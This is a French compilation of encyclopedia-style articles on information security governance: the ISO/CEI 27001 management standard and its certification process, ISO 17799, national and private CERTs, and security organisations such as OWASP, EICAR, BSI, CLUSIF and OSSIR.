L'ISO/CEI 27001 est une norme internationale de système de gestion de la sécurité de l'information, publiée en octobre 2005 par l'ISO dont le titre est Technologies de l'information - Techniques de sécurité - Systèmes de gestion de sécurité de l'information - Exigences.

Objectifs La norme ISO 27001 publiée en octobre 2005 succède à la norme BS 7799-2 de BSI (British Standards Institution)[2]. Elle s’adresse à tous les types d’organismes (entreprises commerciales, ONG, administrations…). La norme ISO/CEI 27001 décrit les exigences pour la mise en place d'un Système de Management de la Sécurité de l'Information (SMSI). Le SMSI est destiné à choisir les mesures de sécurité afin d'assurer la protection des biens sensibles d'une entreprise sur un périmètre défini. C'est le modèle de qualité PDCA (Plan-Do-Check-Act) qui est recommandé pour établir un SMSI afin d'assurer une amélioration continue de la sécurité du système d'information. La norme dicte également les exigences en matières de mesures de sécurité propres à chaque organisme, c’est-à-dire que la mesure n’est pas la même d’un organisme à l’autre. Les mesures doivent être adéquates et proportionnées à l’organisme pour ne pas être ni trop laxistes ni trop sévères. La norme ISO 27001 intègre aussi le fait que la mise en place d’un SMSI et d’outils de mesures de sécurité aient pour but de garantir la protection des actifs informationnels. L’objectif est de protéger les informations de toute perte, vol ou altération, et les systèmes informatiques de toute intrusion. Cela apportera la confiance des parties prenantes. L'ISO/CEI 27001 définit l'ensemble des contrôles à effectuer pour s'assurer de la pertinence du SMSI, à l'exploiter et à le faire évoluer. Plus précisément, l'annexe A de la norme est composée des 133 mesures de sécurité de la norme ISO/CEI 27002 (anciennement ISO/CEI 17799), classées dans 11 sections. Comme pour les normes ISO 9001 et ISO 14001, il est possible de se faire certifier ISO 27001. Un point a disparu par rapport à la norme BS 7799-2, l’ISO 27001 n’incorpore plus l’amélioration de la compétitivité, des cash flow, de la profitabilité, le respect de la réglementation et l’image de marque. ISO/CEI 27001 307

La structure de la norme Les SMSI fonctionnent selon un modèle cyclique en 4 étapes appelé « PDCA » c’est-à-dire Plan, Do, Check, Act également connu sous le nom de Roue de Deming. 1. Phase Plan : consiste à planifier les actions que l’entreprise va entreprendre en termes de sécurité 2. Phase Do : l’entreprise réalise ce qu’elle a planifié dans ce domaine 3. Phase Check : l’entreprise vérifie qu’il n’existe pas d’écart entre ce qu’elle a dit et ce qu’elle a fait 4. Phase Act : consiste à entreprendre des actions correctives pour les écarts qui ont été constatés précédemment La norme 27001 comporte 9 chapitres dont 5 (les chapitres 4 à 8) doivent obligatoirement être respectés pour répondre à cette norme et obtenir une certification. Le chapitre 4 est au cœur de la norme et est divisé en plusieurs parties correspondant aux 4 phases du PDCA. Il détermine la mise en place du SMSI, sa mise en oeuvre et son exploitation, le contrôle du SMSI et son amélioration. Le chapitre 5 définit les engagements et responsabilités de la direction, le chapitre 6 développe les questions d’audits internes du SMSI tandis que les 7e et 8e précisent respectivement le réexamen du SMSI par la direction et son amélioration.

Phase Plan Fixe les objectifs du SMSI La phase Plan du SMSI comprend 4 étapes :

Étape 1 : Définir la politique et le périmètre du SMSI Périmètre : domaine d’application du SMSI. Son choix est libre, mais il doit être bien défini, car il doit comprendre toutes les activités pour lesquelles les parties prenantes exigent de la confiance. Politique : niveau de sécurité (intégrité, confidentialité, disponibilité de l’information) qui sera pratiqué au sein de l’entreprise. La norme n’impose pas de niveau minimum de sécurité à atteindre dans le SMSI. Le choix du périmètre et de la politique étant libre, ces deux éléments sont des « leviers de souveraineté » pour l’entreprise. Ainsi, une entreprise peut être certifiée ISO 27001 tout en définissant un périmètre très réduit et une politique de sécurité peu stricte et sans répondre aux exigences de ses clients en termes de sécurité.

Étape 2 : Identifier et évaluer les risques liés à la sécurité et élaborer la politique de sécurité La norme ISO 27001 ne donne pas de directives sur la méthode d’appréciation des risques à adopter. Les entreprises peuvent donc en inventer une en veillant à bien respecter le cahier des charges ou en choisir une parmi les plus courantes notamment la méthode EBIOS (Expression des Besoins et Identification des Objectifs de Sécurité) mise en place en France par l'ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information). Le cahier des charges relatif à l’appréciation des risques se développe en 7 points : 1.1.Identifier les actifs 2.2.Identifier les personnes responsables 3.3.Identifier les vulnérabilités 4.4.Identifier les menaces 5.5.Identifier les impacts 6.6.Évaluer la vraisemblance 7.7.Estimer les niveaux de risque ISO/CEI 27001 308

Étape 3 : Traiter le risque et identifier le risque résiduel par un plan de gestion Il existe 4 traitements possibles de chacun des risques identifiés : 1. L’acceptation : ne mettre en place aucune mesure de sécurité supplémentaire car les conséquences de cette attaque sont faibles (exemple : vol d’un ordinateur portable ne comportant pas de données primordiales pour l’entreprise, piratage de la vitrine web…) Cette solution ne doit être que ponctuelle pour éviter la perte de confiance des parties prenantes. 2. L’évitement : politique mise en place si l’incident est jugé inacceptable 3. Le transfert : lorsque le risque ne peut pas être évité et qu’elle ne peut pas mettre en place les mesures de sécurité nécessaires elle transfère le risque par le biais de la souscription d’une assurance ou de l’appel à la sous-traitance. 4.4.La réduction : le rendre à un niveau acceptable par la mise en œuvre de mesures techniques et organisationnelles, solution la plus utilisée. Lorsque la décision de traitement du risque est prise l’entreprise doit identifier les risques résiduels c’est-à-dire ceux qui persistent après la mise en place des mesures de sécurité. S'ils sont jugés inacceptables, il faut définir des mesures de sécurité supplémentaires.

Étape 4 : Choisir les mesures de sécurité à mettre en place La norme ISO 27001 dispose d’une annexe A qui propose 133 mesures de sécurité classées en 11 catégories (politique de sécurité, sécurité du personnel, contrôle des accès…) et numérotées sur 3 niveaux. Toutefois cette annexe n’est qu’une liste qui ne donne aucun conseil de mise en œuvre au sein de l’entreprise.

Phase Do Met en place les objectifs Elle se découpe en plusieurs étapes : 1.1.Établir un plan de traitement des risques 2.2.Déployer les mesures de sécurité 3.3.Générer des indicateurs •• De performance pour savoir si les mesures de sécurité sont efficaces •• De conformité qui permettent de savoir si le SMSI est conforme à ses spécifications 4.4.Former et sensibiliser le personnel

Phase Check Consiste à gérer le SMSI au quotidien et à détecter les incidents en permanence pour y réagir rapidement 3 outils peuvent être mis en place pour détecter ces incidents : 1. Les audits internes qui vérifient la conformité et l’efficacité du système de management. Ces audits sont ponctuels et planifiés. 2. Le contrôle interne qui consiste à s’assurer en permanence que les processus fonctionnent normalement. 3. Les revues (ou réexamens) qui garantissent l’adéquation du SMSI avec son environnement. ISO/CEI 27001 309

Phase Act Mettre en place des actions correctives, préventives ou d’amélioration pour les incidents et écarts constatés lors de la phase Check •• Actions correctives : agir sur les effets pour corriger les écarts puis sur les causes pour éviter que les incidents ne se reproduisent • Actions préventives : agir sur les causes avant que l’incident ne se produise • Actions d’amélioration : améliorer la performance d’un processus du SMSI.

Processus de certification La certification n’est pas un but en soi, c’est-à-dire que l’organisme qui décide de mettre en place un SMSI en suivant les exigences de l’ISO 27001, n’a pas pour obligation de se faire certifier. Cependant, c’est l’aboutissement logique de l’implémentation d’un SMSI puisque les parties prenantes n’ont confiance qu’en un système certifié par un organisme indépendant. L’obtention du certificat ISO 27001 passe par trois audits : l’audit initial, l’audit de surveillance et l’audit de renouvellement. L’audit initial porte sur l’ensemble du SMSI. Sa durée est déterminée dans l’annexe C de la norme ISO 27006. L’auditeur ne donne pas la certification, il donne juste un avis qui sera étudié par un comité de validation technique, puis par un comité de certification. Ce n’est qu’après cela qu’elle obtient le certificat pour une durée de trois ans. Dans le cas contraire, il y a un audit complémentaire dans le délai maximum de trois mois. L’organisme devra durant ce délai corriger les problèmes décelés lors de l’audit initial pour obtenir le certificat. L’audit de surveillance a lieu pendant la période de validité du certificat (3 ans) afin de s’assurer que le SMSI est toujours valable. Il y en a un par an. L’audit porte sur les non-conformités relevées lors de l’audit initial ainsi que sur d’autres points : •• Le traitement des plaintes •L’état d’avancement des activités planifiées •L’utilisation de la marque de l’organisation certificatrice •• La viabilité du SMSI • Différentes clauses choisies par l’auditeur. Si l’auditeur relève des non-conformités, le certificat sera suspendu voire annulé. L’entreprise doit donc être perpétuellement mobilisée. L’audit de renouvellement se déroule à l’échéance du certificat. Il porte sur les non-conformités du dernier audit de surveillance ainsi que sur la revue des rapports des audits de surveillance précédents et la revue des performances du SMSI sur la période. ISO/CEI 27001 310

Critique du standard

Avantages •• Une description pratique et détaillée de la mise en œuvre des objectifs et mesures de sécurité. • Un audit régulier qui permet le suivi entre les risques initialement identifiés, les mesures prises et les risques nouveaux ou mis à jour, afin de mesurer l’efficacité des mesures prises. •• Sécurité : 1.1.Processus d'amélioration continue de la sécurité, donc le niveau de sécurité a plutôt tendance à croître. 2.2.Meilleure maîtrise des risques 1.1.Diminution de l'usage des mesures de sécurité qui ne servent pas. •• Une certification qui améliore la confiance avec les parties prenantes. • Homogénéisation : c’est un référentiel international. Cela facilite les échanges, surtout pour les entreprises qui possèdent plusieurs sites. •• Processus simple et peu coûteux : réduction des coûts grâce à la diminution d'usage de mesures de sécurité inutiles et à la mutualisation des audits (baisse du nombre et de la durée des audits quand on obtient la certification). •• La norme fournit des indicateurs clairs et fiables ainsi que des éléments de pilotage financier aux directions générales. •• La norme permet d'identifier plus efficacement les risques et les coûts associés.

Limites •• Parfois, faible expérience des organismes d'accréditation par rapport aux spécificités des enjeux en sécurité des systèmes d'information. • Relations commerciales prépondérantes (achat de certification, de conseil, de produits, de services), ce qui conduit à une dévalorisation du processus d’accréditation. •• Durée courte pour les audits. •• La définition et la mise en place d'une méthodologie sont des tâches lourdes. •• L'application de cette norme ne réduit pas forcément de manière notable le risque en matière de piratage et de vols d'informations confidentielles. Les intervenants, notamment internes, connaissent les règles et peuvent ainsi plus aisément les contourner. Les normes sont inopérantes dans ce domaine.

Autour de la norme Il existe toute une série de normes associée à l'ISO 27001, qui aide à l'implémentation d'un SMSI. ISO/CEI 27001 est issue du standard britannique BS7799:2002 - Part 2.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=ISO/ CEI_27001& action=edit& section=0

[2] Norme ISO 27001 (http:/ / www. bsigroup. fr/ fr/ Services-daudit-et-de-certification/ Systemes-de-management/ Normes-et-programmes/

ISOIEC-27001/ ) sur le site de BSI Group ISO/CEI 17799 311 ISO/CEI 17799

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

La norme ISO/CEI 17799 est une norme internationale concernant la sécurité de l'information, publiée en décembre 2000 par l'ISO dont le titre est Code de bonnes pratiques pour la gestion de la sécurité d'information. La deuxième édition de cette norme a été publiée en juin 2005, elle comporte un nouveau chapitre : "Analyse des risques". Cette deuxième édition a changé de numéro de référence en juillet 2007. Il s'agit maintenant de la norme ISO/CEI 27002.

Annexes

Liens externes • British Standards Institute [1] • Description officielle de la norme ISO/IEC 17799:2005 [2] • Groupe International des Usagers ISO 27000 / 17799 (Anglais) [3]

• Portail de la sécurité de l’information • Portail de la sécurité informatique

Références

[1] http:/ / www. bsi-global. com

[2] http:/ / www. iso. org/ iso/ iso_catalogue/ catalogue_tc/ catalogue_detail. htm?csnumber=39612

[3] http:/ / www. 17799. com 312

11-Organismes 313

11.1-Type

Computer Emergency Response Team

Pour les articles homonymes, voir Cert. En sécurité informatique, il existe des organismes officiels chargés d'assurer des services de prévention des risques et d'assistance aux traitements d'incidents. Ces CERT (Computer Emergency Response Team) sont des centres d'alerte et de réaction aux attaques informatiques, destinés aux entreprises et/ou aux administrations, mais dont les informations sont généralement accessibles à tous.

Rôles des CERT Les tâches prioritaires d'un CERT sont les suivantes : • centralisation des demandes d'assistance suite aux incidents de sécurité (attaques) sur les réseaux et les systèmes d'informations : réception des demandes, analyse des symptômes et éventuelle corrélation des incidents ; •• traitement des alertes et réaction aux attaques informatiques : analyse technique, échange d'informations avec d'autres CERTs, contribution à des études techniques spécifiques ; •• établissement et maintenance d'une base de donnée des vulnérabilités ; •• prévention par diffusion d'informations sur les précautions à prendre pour minimiser les risques d'incident ou au pire leurs conséquences ; •• coordination éventuelle avec les autres entités (hors du domaine d'action) : centres de compétence réseaux, opérateurs et fournisseurs d'accès à Internet CERTs nationaux et internationaux.

Les CERT en France Il existe plusieurs CERTs en France. Voici la liste des équipes membres du FIRST [1] ou de la TF-CSIRT [2] ou certifié CERT [3] : • le CERTA (appartenant à la ANSSI/SGDN) est le CERT affecté au secteur de l'administration française ; • le Cert-IST [4] est le CERT affecté au secteur de l'Industrie, des Services et du Tertiaire (IST). Il a été créé à la fin de l'année 1998 par quatre partenaires : Alcatel, le CNES, ELF et France Télécom ; • le CERT-DEVOTEAM [5] (anciennement APOGEE SecWatch) est un CSIRT privé du groupe Devoteam ; • le CERT-LEXSI [6] est un CSIRT privé du groupe LEXSI (Laboratoire d'EXpertise en Sécurité de l'Information) ouvert à l'ensemble des entreprises et des institutions ; • le CERT-RENATER est le CERT de la communauté des membres du GIP RENATER (Réseau National de télécommunications pour la Technologie, l'Enseignement et la Recherche). • Le CERT-Societe Generale [7] est un CSIRT privé interne du groupe Société Générale. Il est historiquement le premier CERT privé français à avoir été accrédité par le FIRST, en février 2010. • Le CERT-XMCO [8] est un CSIRT privé accrédité depuis janvier 2010 et ouvert aux entreprises. • Le CERT La Poste [9] est le CERT interne du Groupe La Poste. Un autre CERT français est connu, mais qui ne fait ni partie du FIRST ni de la TF-CSIRT : • le FrSIRT est un CSIRT privé de la société A.D.Consulting pour les grandes entreprises et les administrations abonnées aux services de veille technologique VNS. Computer Emergency Response Team 314

En Suisse Le Switch-CERT est employé par Switch, fondation responsable du réseau informatique universitaire[10].

Au Luxembourg • CIRCL [11] (Computer Incident Response Center Luxembourg) : CERT National • GOVCERT.LU [12] (Governmental CERT of Luxembourg) : CERT Gouvernemental • Malware.lu CERT [13] (Luxembourg) : CERT Privé en collaboration avec la société Itrust Consulting • RESTENA-CSIRT [14] : CERT du RESTENA, le réseau à grande vitesse de l'éducation et de la recherche du Grand-Duché de Luxembourg.

En Belgique • CERT.be [15] : Le CERT fédéral, opéré par Belnet (le gestionnaire du réseau académique et administratif).

Notes et références

[1] http:/ / www. first. org/ about/ organization/ teams/

[2] http:/ / www. trusted-introducer. nl/ teams/ alpha_LICSA. html

[3] http:/ / www. cert. org/ csirts/ cert_authorized. html

[4] http:/ / www. cert-ist. com/

[5] http:/ / www. cert-devoteam. fr/

[6] http:/ / cert. lexsi. com

[7] http:/ / cert. societegenerale. com/

[8] http:/ / cert. xmco. fr/

[9] http:/ / www. trusted-introducer. org/ teams/ teams-c. html#CERT-LA-POSTE

[10] http:/ / www. switch. ch/ uni/ security/

[11] https:/ / www. circl. lu

[12] http:/ / govcert. lu/ en/

[13] http:/ / malware. lu/ page/ cert. html

[14] http:/ / www. restena. lu/ csirt/

[15] https:/ / www. cert. be

• Portail de la sécurité informatique • Portail de l’informatique • Portail de la sécurité de l’information 315

11.2-Organismes internationaux

Information Security Forum

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Pour les articles homonymes, voir ISF. Information Security Forum (ISF) est un organisme international et indépendant, créé en 1989. Son but est la recherche des bonnes pratiques dans le domaine de la sécurité de l'information. Il regroupe aujourd'hui plus de 280 membres (RSSI et Risk Manager des entreprises) dont pour plus de 50 % classés dans le classement « Fortune 100 ». Le siège de l'ISF est basé à Londres en Angleterre. Les réunions entre les membres se tiennent sous le nom "chapitre" en Australie, Europe, Afrique, Asie, le Moyen-Orient, Canada, et aux États-Unis.

Lien externe • Site officiel [1]

• Portail de la sécurité informatique • Portail de la sécurité de l’information

Références

[1] http:/ / www. securityforum. org Open Web Application Security Project 316 Open Web Application Security Project

OWASP (Open Web Application Security Project) est une communauté travaillant sur la sécurité des applications Web. Sa philosophie est d'être à la fois libre et ouverte à tous. OWASP est aujourd'hui reconnu dans le monde de la sécurité des systèmes d'information pour ses travaux sur les applications Web. Parmi eux, les projets les plus connus sont les suivants : • Top Ten OWASP [1] : le but de ce projet est de fournir une liste des Dix Risques de Sécurité Applicatifs Web les Plus Critiques. Ce classement fait référence aujourd'hui dans le domaine de la sécurité et est cité par divers organismes (DoD, PCI Security Standard) • WebGoat [2] : il s'agit d'une plateforme de formation permettant à un utilisateur d'apprendre à exploiter les vulnérabilités les plus courantes sur une application Web. • WebScarab [3] : il s'agit d'un proxy disposant de nombreuses fonctionnalités utiles lors de la réalisation d'audits de sécurité. En plus de proposer à l'utilisateur de visualiser les requêtes échangées avec un serveur Web, il est possible de modifier ces requêtes, d'analyser les session ID, etc. • OWASP Testing Guide [4] : il s'agit d'un document de plusieurs centaines de pages destiné à aider une personne à évaluer le niveau de sécurité d'une application Web. • OWASP Code Review Guide [5] : il s'agit d'un document de plusieurs centaines de pages présentant une méthode de revue de code sécurité Par ailleurs, OWASP organise régulièrement des meetings un peu partout dans le monde. Durant ces rendez-vous, des intervenants issus du monde de la sécurité présentent un produit, une faille, un projet OWASP, etc.

Lien • Site internet de la communauté OWASP [6] • Portail du chapitre français d'OWASP [7]

• Portail de la sécurité de l’information • Portail de la sécurité informatique

Références

[1] http:/ / www. owasp. org/ index. php/ Category:OWASP_Top_Ten_Project

[2] http:/ / www. owasp. org/ index. php/ Category:OWASP_WebGoat_Project

[3] http:/ / www. owasp. org/ index. php/ Category:OWASP_WebScarab_Project

[4] http:/ / www. owasp. org/ index. php/ Category:OWASP_Testing_Project

[5] http:/ / www. owasp. org/ index. php/ Category:OWASP_Code_Review_Project

[6] http:/ / www. owasp. org

[7] http:/ / www. owasp. org/ index. php/ France 317

11.3-Aux Etats-Unis

CERT Coordination Center

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le CERT Coordination Center (ou CERT/CC) a été créé par DARPA en novembre 1988 après la frappe du ver Morris. C'est le centre principal de coordination des CERT en termes de sécurité des systèmes d'information.

Lien externe • Site officiel du CERT/CC [1]

• Portail de la sécurité informatique • Portail de la sécurité de l’information

Références

[1] http:/ / www. cert. org/

International Information Systems Security Certification Consortium

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

International Information Systems Security Certification Consortium ((ISC)²) est le nom d'une organisation à but non lucratif dont le siège social est situé à Palm Harbor en Floride (aux États-Unis d'Amérique). Cet organisme est chargé de certifier des professionnels de la sécurité de l'information, en fournissant les certifications SSCP et Certified Information Systems Security Professional (CISSP). Trusted Computing Group 318 Trusted Computing Group

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Pour les articles homonymes, voir TCG. Le Trusted Computing Group (TCG, nommé jusqu'en 2003 TCPA pour Trusted Computing Platform Alliance) est un consortium d'entreprises d'informatique (Compaq, HP, IBM, Intel, Microsoft, AMD, etc.) visant à sécuriser les équipements et communications informatiques.

Objectifs L'objectif du consortium de ces entreprises est de créer le Trusted Computing, soit une informatique dite « de confiance ». Le principe de base consiste à assigner une signature à chaque objet informatique (logiciel, document), et à déléguer à un tiers de confiance la tâche de vérifier si l'objet manipulé est autorisé à être utilisé sur le système informatique local. Tout élément non signé ou dont la signature n'est pas recensée chez le tiers de confiance sera rejeté. Cette technique permet donc de centraliser le contrôle effectué sur les applications utilisées (par exemple dans une optique de lutte contre la contrefaçon). Cependant, un des problèmes soulevés par cette technique est que l'utilisateur final perd toute maîtrise de ce qui peut ou ne peut pas être fait avec son propre ordinateur. Si dans tous les cas c'est d'abord le « tiers de confiance » qui décide, l'utilisateur n'a plus aucun contrôle possible sur le choix de ses logiciels et de leur utilisation. Les standards du TCG sont perçus comme une menace sérieuse par le monde du logiciel libre. Chaque programme devant être accompagné d'une signature[réf. nécessaire], l'obtention de celle-ci pourrait bloquer de nombreux logiciels. Notamment, le problème du prix éventuel des clefs et l'existence de critères de décisions arbitraires inquiètent de nombreux développeurs et utilisateurs des logiciels libres. En trame de fond se cache la possibilité pour de grandes entreprises commerciales d'empêcher toute concurrence sur leur plateforme sécurisée. Cette caractéristique leur a d'ailleurs valu le surnom de Treacherous Computing (informatique déloyale), en opposition au nom officiel Trusted Computing (Informatique de confiance). L'informatique de confiance peut aussi être vue comme une menace pour la protection de la vie privée des utilisateurs puisqu'elle délègue la gestion de l'ordinateur à un tiers de confiance, ce dernier ayant accès à toute donnée contenue sur l'ordinateur. Ces principes d'architecture informatique dits de confiance sont repris par la technologie développée par la société Microsoft et nommée Next-generation secure computing base (anciennement Palladium). La société Apple utilise un mécanisme similaire pour restreindre l'installation et l'utilisation de son système d'exploitation Mac OS X sur des machines à base de processeur Intel dont elle seule assure la fabrication : une puce TPM fournie par Apple doit normalement être présente sur la carte mère pour que ce système d'exploitation y soit utilisable. Les technologies portent les noms LaGrande chez Intel et SEM (Secure Execution Mode) chez AMD. Le projet initial TCPA, et son évolution sous le nom de TCG, a de nombreux liens avec le problème des DRM. Le fondement même de l'informatique de confiance est à terme de mettre en place des DRM en de nombreux points de la chaîne informatique pour contrôler les logiciels (version non contrefaite, absence de virus) et les documents (fichier audio ou vidéo non contrefait). Trusted Computing Group 319

Liens externes • (en) Site officiel [1] • (en) Membres du Trusted Computing Group [2] • (fr) Article(s) expliquant ce qu'est une Trusted Computing Platform [3] (non neutre) Pour en savoir plus sur les risques des Trusted Computing Platforms • (fr) Gnu.org [3] : article de Richard Stallman présentant les dangers potentiels des Trusted Computing Platforms. • (fr) Article Framasoft [4] : Leur « informatique de confiance » vous inspire-t-elle confiance ? • (en) Vidéo sur le concept de Trusted Computing Platforms et son évolution [5] • (fr) la même vidéo, traduite en français, et dans un format ouvert [6]

• Portail de l’informatique • Portail du droit • Portail de la sécurité informatique • Portail de la sécurité de l’information

Références

[1] http:/ / www. trustedcomputinggroup. org/

[2] http:/ / www. trustedcomputinggroup. org/ about_tcg/ tcg_members

[3] http:/ / www. gnu. org/ philosophy/ can-you-trust. fr. html

[4] http:/ / framasoft. net/ article641. html

[5] http:/ / www. lafkon. net/ tc/

[6] http:/ / media. april. org/ video/ TrustedComputing_vf. fr. ogv 320

11.4-Au Québec

Institut de la sécurité de l'information du Québec

L'Institut de la sécurité de l’information du Québec (ISIQ) est une plateforme publique-privée d'échange d'information et de connaissances en matière de sécurité de l'information, ainsi qu'une base d'intervention dont la force repose sur l'expertise et les ressources de ses partenaires. L'ISIQ a cessé ses activités en date du 4 juin 2010[1] .

Présentation Pour animer cette organisation québécoise, les partenaires ont convenu de confier au Centre de recherche informatique de Montréal (CRIM) le mandat de piloter la construction de l'ISIQ, principalement grâce à l'expertise de ses ressources et de sa neutralité. L'ISIQ s'inscrit en effet dans la mission du CRIM, dont plusieurs volets sont complémentaires en regard des technologies de l'information, à savoir : • la recherche appliquée, •• la formation spécialisée, •• le développement logiciel et les meilleures pratiques en informatique, •• le test de logiciels. L'ISIQ s'articule autour de quatre axes principaux d'intervention, soit : • la prévention, l'information et la sensibilisation; •• la surveillance, détection et intervention; • la veille et la recherche; •• le soutien à l'offre de services.

Références

Liens externes

• Site Web de l'ISIQ (https:/ / www. isiq. ca/ )

• Site Web du CRIM (http:/ / www. crim. ca/ )

• Installation de l'ISIQ à Québec (http:/ / www. mdeie. gouv. qc. ca/ page/ web/ portail/ scienceTechnologie/

service. prt?svcid=QUOI_DE_NEUF7& page=details. jsp& iddoc=71377) (Ministère du Développement économique, de l'Innovation et de l'Exportation)

• L'ISIQ lance sa Filière PME (http:/ / www. lesaffaires. com/ article/ 0/ pme/ 2006-05-08/ 232356/

lisiq-lance-sa-filiere-pme. fr. html) (Les Affaires)

• L'ISIQ contre la cybercriminalité (http:/ / www. infobourg. com/ sections/ actualite/ actualite. php?id=11337) (L'Infobourg)

• Portail du Québec • Portail de la sécurité informatique • Portail de la sécurité de l’information 321

11.5-En Europe

European Institute for Computer Antivirus Research

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

European Institute for Computer Antivirus Research (ou EICAR), est une organisation fondée en 1990, dont l'objectif est la recherche en virologie informatique et l'amélioration du développement des logiciels antivirus. Récemment, EICAR a élargi son programme de recherche en incluant l'ensemble des logiciels malveillants. EICAR est connu pour fournir le fichier de test Eicar, une chaîne de caractères exécutable mais inoffensive, destinée à tester l'intégrité de logiciels antivirus.

Lien externe • (en) Site officiel [1]

• Portail de la sécurité informatique

Références

[1] http:/ / www. eicar. org Office fédéral de la sécurité des technologies de l'information 322 Office fédéral de la sécurité des technologies de l'information

Pour les articles homonymes, voir BSI.

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

L’Office fédéral de la sécurité des technologies de l’information (Bundesamt für Sicherheit in der Informationstechnik ou BSI) est une administration allemande créée en 1991 et chargée de la sécurité des technologies de l’information et de la communication. Il s’occupe notamment de la sécurité des logiciels, de la protection des infrastructures de communications, de la sécurité dans le cyberespace, de cryptographie, de contre-écoute électronique, de certification de produits de sécurité et de l’accréditation de laboratoires de test. C’est une administration fédérale supérieure placée sous la tutelle du ministère fédéral de l’Intérieur. Elle emploie environ 400 personnes et est située à Bonn. Son prédécesseur est la section de cryptographie du Service fédéral de renseignement (BND), l’administration chargée de la sécurité extérieure. Le BSI conçoit encore des algorithmes de chiffrement, tel le chiffre Libelle.

Lien externe • (de) Bundesamt für Sicherheit in der Informationstechnik [1]

• Portail de l’Allemagne • Portail de la sécurité informatique • Portail du renseignement • Portail de la sécurité de l’information

Références

[1] http:/ / www. bsi. bund. de/ 323

11.7-En France

Club de la sécurité de l'information français

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le "Club de la Sécurité de l'Information Français", plus connu sous le nom de CLUSIF (anciennement "Club de la sécurité des systèmes d'information français"), est une association française créée en 1985 par Jean-Marc Lamère, Jean-Philippe Jouas, Pascal Lointier et Didier Trarieux-Lumière. Le CLUSIF est une association à but non lucratif d'entreprises et de collectivités réunies en groupes de réflexion et d'échanges autour de différents domaines de la sécurité de l'information : gestion des risques, politiques de sécurité, cybercriminalité, intelligence économique, etc. Le résultat des travaux du CLUSIF est disponible depuis son site, en particulier la méthode de gestion des risques Mehari. Les CLUSIR ("Clubs de la sécurité de l'information régionaux") sont des associations régionales décentralisées et agréées par le CLUSIF. Elles ont pour vocation de rassembler les différents acteurs de la sécurité des systèmes d'information tels que utilisateurs, offreurs de produits ou de services, collectivités publiques. Elles favorisent également les relations avec les universités délivrant des diplômes de troisième cycle en sécurité des systèmes d'information. Elles se positionnent comme relais régional des actions du CLUSIF et agissent dans l'esprit du code d'éthique de ce dernier. Le CLUSIF est aussi associé à d'autres CLUSI, en particulier en Europe, afin de promouvoir la protection de l'information des entreprises et des organisations dans les pays concernés. Observatoire de la sécurité des systèmes d'information et des réseaux 324 Observatoire de la sécurité des systèmes d'information et des réseaux

L'Observatoire de la sécurité des systèmes d'information et des réseaux (OSSIR) est une association à but non lucratif (loi de 1901) existant depuis 1996 qui regroupe les utilisateurs intéressés par la sécurité des systèmes d'information et des réseaux.

L'OSSIR en quelques mots

L'association comprend actuellement quatre groupes de travail et un groupe de réflexion qui organisent des réunions périodiques (Cf. §1). Chaque année, l'association organise la Journée de la Sécurité des Systèmes d'Information ou JSSI (Cf. §2). L'OSSIR sponsorise la participation à des conférences sous réserve que le participant fasse un compte-rendu au groupe (Cf. §3).

Le 15 juin 2009, l'OSSIR a mis en ligne son nouveau site Web au format 2.0, succédant ainsi à un site web au graphisme et à la technologie vieillissants inauguré en 1997.

Groupes de travail Les membres de l'association animent : •• quatre groupes de travail régionaux : • Paris depuis 1987, issu de la fusion du groupe Windows et SUR en 2008 ; • RéSIST (Toulouse) depuis 1997 ; • Bretagne depuis 2007 ; • Rhône-Alpes depuis 2009. • un groupe de réflexion Technico-Juridique. Ces réunions permettent des échanges et des présentations techniques de solutions et d'expériences en sécurité. La participation aux groupes de travail est gratuite et libre d'accès. Les groupes se réunissent, en général, une fois par mois. À titre d’exemple, voici quelques sujets traités récemment dans les différents groupes : • Présentation de la loi sur l’économie numérique ; •• Présentation de Sebek, outil de capture pour espionner les pirates en modifiant directement le noyau (auteurs du portage) ; • Utilisation avancée de VMWare dans le cadre d’un Honeypot ; •• Le projet frenchhoneynet ; • Avenir de la détection d’intrusion et la vision d’ISS ; • Retour d’expérience sur le déploiement de SpamAssassin ; •• Compte rendu des conférences BlackHat et DEFCON ; • Virus, Trojans, Spywares et Malwares. Évolution de l’attaque et de la défense ; • Analyse post-mortem d’une machine Windows ; •• Revue mensuelle d'actualité sécurité ; • Nouveautés de Windows Vista pour la sécurité ; •• Analyse différentielle de binaires ; • Sécurité du logiciel Skype ; • Sécurité de Windows Mobile ; •• Discussion autour des lois et de la jurisprudence concernant la sécurité informatique ; •• Sécurité informatique et expertise judiciaire. Observatoire de la sécurité des systèmes d'information et des réseaux 325

JSSI L'OSSIR organise une conférence, la JSSI (Journée de la Sécurité des Systèmes d'Information)[1], autour d'un thème différent chaque année : •• « Dépendance aux nouvelles technologies » (2006) ; •• « Le SI 2.0 : une évolution ou un bouleversement... pour la sécurité ? » (2007) ; •• « Anonymat, vie privée et gestion d'identité... » (2008) ; •• « Les nouveaux visages de l'insécurité informatique » (2009). Les membres de l'association bénéficient de réduction pour la participation à la JSSI.

Sponsoring et parrainage L'OSSIR peut aider ses membres qui désirent assister à des conférences de sécurité et demande, en échange, de réaliser un compte rendu dans un groupe de travail[2]. L'OSSIR parraine différentes manifestations de SSI françaises ou internationales, en participant à leurs comités de programme ou d'organisation. En contrepartie, l'OSSIR demande des avantages pour ses membres comme des réductions pour les inscriptions à ces manifestations.

